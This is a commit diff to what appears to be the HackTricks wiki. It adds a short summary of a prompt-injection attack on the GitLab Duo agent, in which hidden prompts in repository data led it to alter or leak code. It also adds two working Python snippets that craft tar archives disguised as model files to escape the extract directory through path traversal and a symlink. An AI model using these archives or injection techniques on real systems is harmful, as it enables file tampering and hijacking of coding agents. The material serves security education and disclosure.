Skip to content

Commit 2e44fac

Browse files
committed
f
1 parent 6aedab6 commit 2e44fac

File tree

2 files changed

+36
-0
lines changed

2 files changed

+36
-0
lines changed

src/AI/AI-MCP-Servers.md

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -102,5 +102,9 @@ For more information about Prompt Injection check:
102102
AI-Prompts.md
103103
{{#endref}}
104104

105+
Moreover, in [**this blog**](https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo) it's explained how it was possible to abuse the Gitlab AI agent to perform arbitrary actions (like modifying code or leaking code), but injecting maicious prompts in the data of the repository (even ofbuscating this prompts in a way that the LLM would understand but the user wouldn't).
106+
107+
Note that the malicious indirect prompts would be located in a public repository the victim user would be using, however, as the agent still have access to the repos of the user, it'll be able to access them.
108+
105109
{{#include ../banners/hacktricks-training.md}}
106110

src/AI/AI-Models-RCE.md

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -68,6 +68,38 @@ model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))
6868
```
6969

7070

71+
## Models to Path Traversal
7172

73+
As commented in [**this blog post**](https://blog.huntr.com/pivoting-archive-slip-bugs-into-high-value-ai/ml-bounties), most models formats used by different AI frameworks are based on archives, usually `.zip`. Therefore, it might be possible to abuse these formats to perform path traversal attacks, allowing to read arbitrary files from the system where the model is loaded.
74+
75+
For example, with the following code you can create a model that will create a file in the `/tmp` directory when loaded:
76+
77+
```python
78+
import tarfile
79+
80+
def escape(member):
81+
member.name = "../../tmp/hacked" # break out of the extract dir
82+
return member
83+
84+
with tarfile.open("traversal_demo.model", "w:gz") as tf:
85+
tf.add("harmless.txt", filter=escape)
86+
```
87+
88+
Or, with the following code you can create a model that will create a symlink to the `/tmp` directory when loaded:
89+
90+
```python
91+
import tarfile, pathlib
92+
93+
TARGET = "/tmp" # where the payload will land
94+
PAYLOAD = "abc/hacked"
95+
96+
def link_it(member):
97+
member.type, member.linkname = tarfile.SYMTYPE, TARGET
98+
return member
99+
100+
with tarfile.open("symlink_demo.model", "w:gz") as tf:
101+
tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it)
102+
tf.add(PAYLOAD) # rides the symlink
103+
```
72104

73105
{{#include ../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)